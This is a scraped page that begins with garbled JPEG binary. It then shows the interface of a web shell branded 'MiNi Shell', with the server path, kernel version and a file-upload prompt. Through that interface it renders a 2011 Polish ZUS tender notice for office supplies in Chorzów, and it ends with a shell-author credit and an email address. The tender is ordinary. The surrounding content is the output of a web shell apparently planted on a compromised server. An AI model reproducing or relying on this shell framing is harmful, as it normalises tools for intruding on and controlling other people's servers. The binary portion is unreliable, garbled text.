JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/425794-N-2011.html

<p class="kh_header"><b>Chorzów: Dostawa materiałów biurowych dla potrzeb Zakładu Ubezpieczeń Społecznych Oddziału w Chorzowie przy ul. gen. Henryka Dąbrowskiego 45</b><br>
<b>Numer ogłoszenia: 425794 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Chorzowie , ul. gen. Henryka Dąbrowskiego 45, 41-500 Chorzów, woj. śląskie, tel. 032 3490538, faks 032 3490580.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych dla potrzeb Zakładu Ubezpieczeń Społecznych Oddziału w Chorzowie przy ul. gen. Henryka Dąbrowskiego 45.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia
Przedmiotem zamówienia jest dostawa materiałów biurowych dla potrzeb Zakładu Ubezpieczeń Społecznych Oddziału w Chorzowie przy ul. gen. Henryka Dąbrowskiego 45.

Zakres niniejszego zamówienia obejmuje niżej wymienione szacunkowe ilości materiałów biurowych:
1.Cienkopisy Centropen - wyposażone w plastikową końcówkę oprawioną w metal  z wentylowaną skuwką o grubości linii 0,4 mm długość linii pisania min. 1 000 m;  różne kolory - 2 000 szt.
2.Gumki recepturki o średnicy min. 80mm i szerokości min. 3 mm, rozciągliwe         w opakowaniu po 100 g - 400 p.
3.Gumki biurowe STAEDLER - o wymiarach min. 43x19x13 mm do precyzyjnego ścierania grafitu z papieru (nie pozostawia śladów grafitu, nie niszczy ścieranej powierzchni)  dwukolorowa - część biała służy do ścierania ołówka, część niebieska do wycierania atramentu, owinięta w celofan - 130 szt.
4.Długopis automatyczny - ZENITH 7 - z metalowym wkładem wielkopojemnym ZENITH 4 metalowy klips i końcówka - 1 200 szt. kompatybilny z poz. 41.
5.Długopis z przylepcem na sprężynce stojący - wygodny w użyciu długopis na sprężynce z wymiennym zwykłym wkładem, posiada samoprzylepną podkładkę; wyposażony w rozciągliwą sprężynkę - do około 1 m  - 150 szt.
6.Dziurkacz mały - mocny dziurkacz biurowy wykonany z metalu, możliwość dziurkowania jednocześnie min. 25 kartek, odległość między dziurkami 80mm; wyposażony w pojemnik   na śmieci oraz ogranicznik formatu - 30 szt.
7.Klej w sztyfcie AMOS 8 g - klej (odpowiednia ilość wody pozwala na dobre klejenie powierzchni oraz powoduje,że klej nie zasycha) do trwałego klejenia papieru, tektury, etykiet i in.nietoksyczny, nie marszczy papieru, bezzapachowy,zmywalny posiadający atest PZH - 2 500 szt.
8.Koszulki A4 na dokumenty -  do przechowywania dokumentów; wykonane z ekologicznego polipropylenu (PP) o grubości 48 mic. z europerforacją umożliwiającą wpięcie do każdego typu segregatora,otwierane od góry, pakowane w folii  po 100 sztuk - 70 000 szt.
9.Korektor w płynie Tipp-Ex Agua - ekologiczny korektor na bazie wody, idealnie kryjący, bezzapachowy i odporny na światło o poj. 20ml - 10 szt.
10.Linijka  20 cm - wykonana z przezroczystego polistyrenu z trwałą i nieścieralną podziałką - 20 szt.
11.Linijka  30 cm -  wykonana z przezroczystego polistyrenu z trwałą i nieścieralną podziałką -20 szt.
12.Linijka 50 cm - wykonana z metalu z trwałą i nieścieralną podziałką - 10 szt.
13.Marker permanentny PILOT MID B - do każdej powierzchni o grubości linii od 2 do 5mm ze ściętą  lub okrągłą końcówką wg potrzeb zamawiającego, aluminiowa obudowa, przyjazny dla środowiska, nie zawiera ksylenu, w kolorze czarnym i czerwonym - 400 szt.
14.Marker permanentny PILOT  - dwustronny marker do pisania po każdej powierzchni, doskonały do opisywania płyt CD/DVD i folii, wyposażony w dwa rodzaje końcówek piszących - F - linia pisania 0,9 mm oraz EF - linia pisania 0,4mm; przyjazny dla środowiska  - 10 szt. 
15.Mazaki - flamastry biurowe, różne kolory o  zaokrąglonych końcówkach o grubości linii 2 - 3 mm - 900 szt.
16.Karteczki samoprzylepne  w różnych kolorach w bloczku 100 artek o wymiarach 76 x 76 mm 100 kart - 300 szt.
17.Nożyczki biurowe uniwersalne  - do cięcia papieru, kartonu, tektury, zdjęć, taśmy samoprzylepnej wykonane z nierdzewnej stali bardzo wysokiej jakości, z ergonomiczni wyprofilowaną rękojeścią powlekaną tworzywem o wymiarze od 19 do 22 cm - 50 szt.
18.Ołówek HB - NORIS STAEDTLER odporny na złamania, bez gumki -1 200 szt.
19.Ofertówka przeźroczysta A4 - wykonana ze sztywnej folii PCV o bardzo wysokiej przeźroczystości o grubości 0,20 mm; zgrzewana w kształcie litery L format A4 - 400 szt.
20.Pinezki - metalowe, zwykłe po 50 szt. w opakowaniu kartonowym - 10 p.
21.Poduszka do stempli  COLOP - poduszki do stempli o wymiarach 50 x 90 mm  w pudełku z tworzywa o wysokiej jakości i wytrzymałości z wkładem barwiącym w różnych kolorach do wielokrotnego nasączania; kompatybilne z pozycją nr 40 (tusz do stempli) - 80 szt.
22.Plomba plastikowa Multiseal - wykonana z twardego niełamliwego tworzywa - długość wąsa min. 27 cm pakowane po 100 sztuk  - 11 600 szt.
23.Pojemnik magnetyczny na spinacze - pojemnik plastikowy z umieszczonym w górnej części magnesem ułatwiającym wyjmowanie spinaczy - 60 szt.
24.Rozszywasz Deli - do wszelkiego rodzaju zszywek, z blokadą zabezpieczającą przed skaleczeniem - 25 szt. 
25.Segregator VAU PE A4 75 - z dobrej jakości mechanizmem z dociskiem, oklejony na zewnątrz poliolefiną, wewnątrz papierem, z wymienną etykietą na zewnątrz, na dolnych krawędziach metalowe okucia, na grzbiecie otwór na palec, dwa otwory na przedniej okładce, szerokość grzbietu 75 mm; różne kolory - 500 szt.
26.Skorowidz A4/96 - w twardej oprawie, szyty wyposażony w tłoczony indeks, liniatura: kratka 96 kartek - 15 szt.
27.Skoroszyt oczkowy A4 wpinany - wykonany ze sztywnej folii, przednia okładka przeźroczysta, tylnia kolorowa, na przedniej okładce papierowy wymienny pasek do opisu, zaokrąglone rogi obu okładek, wyposażony w perforację umożliwiającą wpięcie do segregatora; format A4 - 1500 szt.
28.Skoroszyt A4 tekturowy - wykonany z białego kartonu min. 250g/m2, zwykły, pełny, czysty - bez nadruku, format A4, pakowany po 50  sztuk w paczce - 50 000 szt.
29.Spinacze GRAND  - biurowe, niklowane, pakowane po 100 sztuk  w paczce, rozmiar 28 mm - 1 700 p.
30.Spinacze GRAND  - biurowe, niklowane, pakowane po 100 sztuk  w paczce, rozmiar 50 mm - 250 p.		
31.Klips archiwizacyjny typu Fellowes - plastikowy spinacz przeznaczony do błyskawicznego spinania dokumentów wyjmowanych z segregatora bez konieczności przekładania kartka po kartce, w opakowaniach po 100 sztuk - 50 000 szt.
32.Szuflada na dokumenty DUAL A4 - wykonana z mocnego przeźroczystego, dymnego plastiku wyposażona w prowadnice umożliwiające łączenie szuflad pionowo lub pod skosem , specjalnie wyprofilowany i wycięty przód umożliwia łatwe wkładanie i wyjmowanie dokumentów - 20 szt.
33.Taśma klejąca pakowa GRAND  - jednostronnie klejąca taśma o bardzo dobrych właściwościach klejących przeznaczona do zaklejania paczek, przesyłek i kartonów o wymiarze szerokość 48mm długość 50m - 350 szt.
34.Taśma barwiąca Black Point - do maszyn do liczenia, dwuszpulowa, czerwono/czarna  o wymiarze 13mm x 6m - 70 szt.	
35.Taśma klejąca biurowa przeźroczysta  - idealnie przeźroczysta taśma klejąca wykonana z polipropylenu pokryta emulsyjnym klejem akrylowym o wymiarach 24 x 20 mm -700 szt.  
36.Teczka A4 z gumką - wykonane z nieprzeźroczystej, grubej folii, wyposażone w trzy wewnętrzne skrzydła o wymiarach: 2 skrzydła min. 5 cm (góra, dół) i 3 skrzydło min.8 cm, wyposażona w narożne gumki zamykające, szerokość grzbietu min. 1,5 cm, różne kolory - 600 szt.
37.Teczka do podpisu  - okładka z twardego kartonu oklejonego materiałem introligatorskim - w stonowanych ciemnych kolorach, grzbiet kryty w formie harmonijki, 10 kartonowych przekładek z otworami - 20 szt.
38.Teczka do wiązania - wykonana z białego kartonu o grubości min. 250 g-m2 pakowana po 50 sztuk w paczce - 10 000 szt.
39.Temperówka FIAN - trwała, pojedyncza temperówka wykonana z metalu w kształcie klina - 40 szt. 
40.Tusz do stempli COLOP - uniwersalny tusz wodny do stempli ręcznych i samotuszujących; w  pojemnikach o pojemności  25ml z końcówką ułatwiającą nasączanie poduszek oraz nakrętką w kolorze tuszu, różne kolory, kompatybilny z pozycją nr 21 (poduszki do stempli) - 350 szt.
41.Wkład do długopisu ZENITH 4 - wielkopojemny metalowy wkład do długopisu z kulką, tusz dokumentalny odporny na działanie światła i wody, szerokość linii pisania 0,5 - 0,7 mm, długość linii pisania 2500m, kompatybilny z poz. nr 4 (długopis ZENITH) - 2 500 szt. 
42.Zakreślacz - do zaznaczania tekstów pisanych na wszelkiego rodzaju papierze zwykłym i węglowym, kserokopiach oraz na wydrukach z drukarek atramentowych; obudowa z polipropylenu; mocna ścięta końcówka pozwalająca osiągnąć grubość linii około 1-5 mm, tusz fluorescencyjny odporny na działanie wody i światła, różne kolory - 200 szt.
43.Zeszyt A4 - 96 kartek w kratkę w twardej introligatorskiej oprawie - 400 szt.
44.Zeszyt A-5  - 60 kartek w kratkę w miękkiej oprawie - 500 szt.  
45.Zszywacz - średniej wielkości zszywacz biurowy wykonany z metalu  lub z bardzo wytrzymałego tworzywa sztucznego z mechanicznymi częściami metalowymi do jednorazowego zszywania min. 20 kartek (papier 80 g/m2  zszywkami o wym.24/6 i 24/8 - 100 szt.
46.Zszywki  - wysokiej jakości i twardości, galwanizowane o rozmiarze 24/6 w paczkach po 1 000 sztuk; kompatybilne z poz. nr 45 (zszywacz) - 3 500 p.
47.Zszywki - wysokiej jakości i twardości, galwanizowane o rozmiarze 24/8 w paczkach po 1 000 sztuk; kompatybilne z poz. nr 45 (zszywacz) - 200 p. 
48.Zszywki do zszywacza kasetowego LEITZ 5551 - zszywki stalowe, ocynkowane  w kasetach po 5 x 210 szt. w rozmiarach 26/6; 26/8; 26/10; 26/12 - 10 kpl.
49.Składanka komputerowa pojedyncza  wym. 240*12*1  (2000 składek = 1 p.) - 30 p.                                 
50.Składanka komputerowa 2 warstwowa (1+1 kolor) o wym. 240*12*2  (900 składek = 1 p.) -20 p.          
51.Składanka  komputerowa 3 warstwowa (1+2 kolor)o wym. 240*12*3 (600 składek = 1 p.) -             20 p.                      
52.Rolki do faxu  wymiar szer.210 mm x 30 m dł. - 170 rol.  
53.Rolki offsetowe o wym. szer. 57mm 30m dł. - 2 400 rol.                                          
54.Etykiety samoprzylepne 70x37 mm - uniwersalne etykiety samoprzylepne białe,  w arkuszach formatu A4, do stosowania w drukarkach atramentowych i laserowych; pakowane po 100 arkuszy - 24 etykiet na arkuszu - 40 p.
55.Etykiety samoprzylepne 105x37 mm - uniwersalne etykiety samoprzylepne białe, w arkuszach formatu A4, do stosowania w drukarkach atramentowych i laserowych; pakowane po 100 arkuszy - 16 etykiet na arkuszu - 12 p.
56.Etykiety samoprzylepne 105 x 48 mm - uniwersalne etykiety samoprzylepne białe,w arkuszach formatu A4, do stosowania w drukarkach atramentowych i laserowych; pakowane po 100 arkuszy - 12 etykiet na arkuszu - 5 p.
57.Etykiety samoprzylepne 105x148mm - uniwersalne etykiety samoprzylepne białe, w arkuszach formatu A4, do stosowania w drukarkach atramentowych i laserowych; pakowane po 100 arkuszy - 4 etykiety na arkuszu - 10 p.
58.Papier A4 samoprzylepny, biały (nie dzielony), pakowane po 100 arkuszy - 1 p.
59.Papier na dyplomy A4 do drukarek atramentowych i laserowych (170g/m2) -   w opakowaniach po 25 arkuszy - 25 p.
60.Etykiety samoprzylepne ZWECKFORM 88,9x35,7 - komputerowe na składance -  1 p.
		
Wykonawca udzieli na dostarczone materiały biurowe - min. 12 miesięcy gwarancji jakości i rękojmi za wady licząc od dnia przyjęcia dostawy bez zastrzeżeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.95.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu winien przed upływem terminu składania ofert wnieść wadium w wysokości: 2 750,00 zł słownie: dwa tysiące siedemset pięćdziesiąt zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek posiadania wiedzy i doświadczenia Zamawiający uzna wykonawców, którzy wykonali w okresie ostatnich 3 lat (przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej dwa zamówienia (jedno zamówienie - jedna umowa) odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia i spełniające niżej podane wymagania:
-  każde zamówienie było związane z dostawą materiałów biurowych,
- każde zamówienie było o wartości brutto tj. z podatkiem VAT min. 130 000 zł. (słownie: sto trzydzieści tysięcy  liczonej  maksymalnie w okresie 12 miesięcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, iż posiada:
- do dyspozycji własne środki finansowe lub zdolność kredytową w wysokości niezbędnej do wykonania zamówienia,
-  posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia równą co najmniej 100 000 zł. (słownie: sto tysięcy zł.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie, że Wykonawca posiada własne środki finansowe lub zdolność kredytową w wysokości niezbędnej do wykonania zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian - zgodnie z wzorem umowy załączonym do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl/zampub<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Chorzowie, 41-500 Chorzów, ul. gen. Henryka Dąbrowskiego 45, III piętro, pokój 325.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych Oddział w Chorzowie, 41-500 Chorzów, ul. gen. Henryka Dąbrowskiego 45, Sekretariat, III piętro, pokój 328.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com